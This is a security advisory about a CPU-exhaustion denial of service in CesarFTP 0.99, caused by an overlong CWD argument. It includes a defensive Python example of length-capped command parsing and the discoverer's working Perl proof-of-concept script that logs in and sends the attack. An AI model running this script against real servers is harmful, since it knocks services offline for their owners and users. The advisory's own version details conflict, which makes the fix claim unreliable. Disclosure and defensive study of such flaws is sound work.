Reported December 23, 2003, by zib zib.

VERSIONS AFFECTED

  • ACLogic's CesarFTP 0.99 (the proof of concept below states it was tested against 0.99g on Windows XP SP1)

DESCRIPTION

  •  A Denial of Service (DoS) condition exists in ACLogic's CesarFTP 0.99. By issuing a CWD command with an overlong argument (the proof of concept below sends roughly ten thousand '.' characters as the pathname), an authenticated attacker can cause the FTP server to consume large amounts of CPU time. Only a valid login is required; an anonymous account suffices where one is enabled.
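
As an added example, not code from this advisory or from CesarFTP (which is closed source), the following Python shows the check a server needs so that this class of input costs it nothing: the control-connection reader caps the command line length before the CWD handler ever sees the argument, and the CWD handler caps the argument again before doing any path work. The limits (512 bytes per line, 255 bytes for a path argument), the reply strings and the client byte stream are assumptions constructed for the example.

```python
"""Bounded FTP command reader and CWD handler.

Added example for this advisory; it is not CesarFTP code (which is closed
source) and the limits, reply strings and client input are assumptions.
"""
import io
import posixpath

# Assumed limits.  Legitimate FTP command lines are short; anything beyond a
# few hundred bytes is either a bug or an attack and is cheapest to refuse.
MAX_LINE = 512        # bytes per command line, CRLF included
MAX_PATH_ARG = 255    # bytes allowed for a CWD argument


def read_command(stream, max_line=MAX_LINE):
    """Read one command line from a binary stream with a hard length cap.

    Returns (line_without_crlf, None) or (None, error_reply).  readline(size)
    never returns more than `size` bytes, so an oversized line is detected
    after at most max_line bytes and the remainder is drained in bounded
    chunks; the 10 KB argument of the proof of concept is never assembled.
    """
    line = stream.readline(max_line)
    if not line:
        return None, "421 Service closing control connection.\r\n"
    if not line.endswith(b"\n"):
        if len(line) < max_line:           # EOF in the middle of a line
            return None, "421 Service closing control connection.\r\n"
        while True:                        # discard the rest of the long line
            rest = stream.readline(max_line)
            if not rest or rest.endswith(b"\n"):
                break
        return None, "500 Command line too long.\r\n"
    return line.rstrip(b"\r\n"), None


def parse_command(line):
    """Split b'CWD pub' into ('CWD', b'pub'); the verb is case-insensitive."""
    verb, _, arg = line.partition(b" ")
    return verb.upper().decode("ascii", "replace"), arg


def handle_cwd(cwd, arg, max_arg=MAX_PATH_ARG):
    """Apply a CWD to the virtual current directory `cwd`; returns (cwd, reply).

    The length check comes first, so the work done per request is bounded
    before any decoding or path normalisation happens.  normpath on an
    absolute path cannot climb above '/', which keeps the virtual root intact.
    """
    if len(arg) > max_arg:
        return cwd, "501 Pathname too long.\r\n"
    try:
        text = arg.decode("utf-8")
    except UnicodeDecodeError:
        return cwd, "501 Syntax error in parameters or arguments.\r\n"
    if not text:
        return cwd, "501 Syntax error in parameters or arguments.\r\n"
    target = posixpath.normpath(posixpath.join(cwd, text))
    return target, "250 Directory successfully changed.\r\n"


def run_session(client_bytes, cwd="/"):
    """Drive the reader and handler over a constructed client byte stream.

    Returns (replies, final_cwd): what the server would have sent, in order.
    """
    stream = io.BytesIO(client_bytes)
    replies = []
    while True:
        line, err = read_command(stream)
        if err:
            replies.append(err)
            if err.startswith("421"):
                break
            continue
        verb, arg = parse_command(line)
        if verb == "QUIT":
            replies.append("221 Goodbye.\r\n")
            break
        if verb == "CWD":
            cwd, reply = handle_cwd(cwd, arg)
        else:
            reply = "502 Command not implemented.\r\n"
        replies.append(reply)
    return replies, cwd


# Constructed client input mirroring the proof of concept: a normal CWD, then
# a CWD whose argument is 10001 dots, then a CWD back up, then QUIT.
POC_STREAM = (b"CWD pub\r\n"
              + b"CWD " + b"." * 10001 + b"\r\n"
              + b"CWD ..\r\n"
              + b"QUIT\r\n")

if __name__ == "__main__":
    for reply in run_session(POC_STREAM)[0]:
        print(reply.rstrip())
```

Running the block prints the four replies for the constructed stream. The oversized CWD costs the server one 512-byte read plus a drain loop that reads in 512-byte chunks, and the 10 KB argument never reaches the path handler; a real server reading from `sock.makefile("rb")` gets the same `readline(limit)` behaviour from the buffered reader, so the pattern carries over unchanged.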

DEMONSTRATION

The discoverer posted the following Perl script as proof of concept. It logs in with the supplied credentials and then sends a single CWD whose argument is about ten thousand '.' characters:

#!/usr/bin/perl -w
use strict;
use warnings;
use IO::Socket;

########################################
#          _   _
#  ____   (_) | |__
# |_  /   | | | '_ \
#  / /    | | | |_) |
# /___|   |_| |_.__/
#
# http://coding.romainl.com/
#
########################################
##
########################################
## tested on CesarFTP 0.99g + WindowsXP Sp1
##
## server : 127.0.0.1
## user : zib
## pass : zib
##
##$ perl expl.pl localhost zib zib
##
##server : localhost
##user : zib
##pass : zib
##
##[~] prepare to connect...
##[+] connected
##[~] prepare to send data...
##[+] success
##[~] Send CPU Overload Sequence...
##[+] CPU Overload Sequence sent
##$
########################################

if (@ARGV < 3)
{
    print "#############################################################\n";
    print " CesarFTP 0.99g : CPU Overload\n";
    print " by zib http://coding.romainl.com/ \n";
    print " 22/12/03\n";
    print "#############################################################\n";
    print " Usage:\n";
    print " cesar0.99g_dos.pl <host> <user> <pass>\n";
    print "\n";
    print " <host> - host for attack\n";
    print " <user> - a valid ftp user account, could be anonymous\n";
    print " <pass> - pass for the login\n";
    print "#############################################################\n";
    exit();
}

my $server = $ARGV[0];
my $user   = $ARGV[1];
my $pass   = $ARGV[2];
my $nb     = 10000;   # number of '.' characters sent as the CWD argument

print "\n";
print "server : $server\n";
print "user : $user\n";
print "pass : $pass\n";
print "\n";

print "[~] prepare to connect...\n";

my $socket = IO::Socket::INET->new(Proto => "tcp", PeerAddr => $server, PeerPort => 21)
    || die "[-] connect failed\n";
if ($socket)
{
    print "[+] connected\n";
    sleep(5);

    # Consume the 220 banner so the replies printed below line up with the
    # commands that produced them.
    my $banner = <$socket>;
    print $banner if defined $banner;

    print "[~] prepare to send data...\n";
    print $socket "USER $user\r\n";
    print "USER $user\r\n";
    sleep(1);
    while (<$socket>)
    {
        print $_;
        last;
    }

    print $socket "PASS $pass\r\n";
    print "PASS $pass\r\n";
    sleep(1);
    while (<$socket>)
    {
        print $_;
        last;
    }

    print "[+] success\n";
    print "[~] Send CPU Overload Sequence...\n";
    # The DoS trigger: one CWD whose argument is $nb+1 dots (about 10 KB).
    print $socket "CWD ";
    for (my $i = 0; $i <= $nb; $i = $i + 1)
    {
        print $socket ".";
    }
    print $socket "\r\n";
    print "CWD sent\n";
    sleep(1);
    # Print whatever the server still sends until it closes the connection.
    while (<$socket>)
    {
        print $_;
    }

    print "[+] Done\n";
}

VENDOR RESPONSE

ACLogic (http://www.aclogic.com/) has released version 0.99g, which doesn't contain this vulnerability. Note that the proof of concept above states it was tested against 0.99g on Windows XP SP1, so confirm the fix against the build you actually run rather than trusting the version string alone.

CREDIT

Discovered by zib zib.